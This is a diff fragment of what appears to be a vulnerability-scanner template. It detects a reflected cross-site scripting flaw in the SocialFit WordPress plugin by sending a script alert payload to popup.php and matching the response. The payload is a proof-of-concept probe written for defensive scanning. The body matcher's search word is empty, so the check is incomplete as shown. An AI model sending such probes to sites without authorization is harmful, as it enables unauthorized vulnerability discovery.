+ SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+ reference: |
+ - https://www.exploit-db.com/exploits/37481
+ tags: wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%281%29%3C/script%3E'
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ''
+ - type: word
+ part: header
+ words:
+ - "text/html"
+ - type: status
+ status:
+ - 200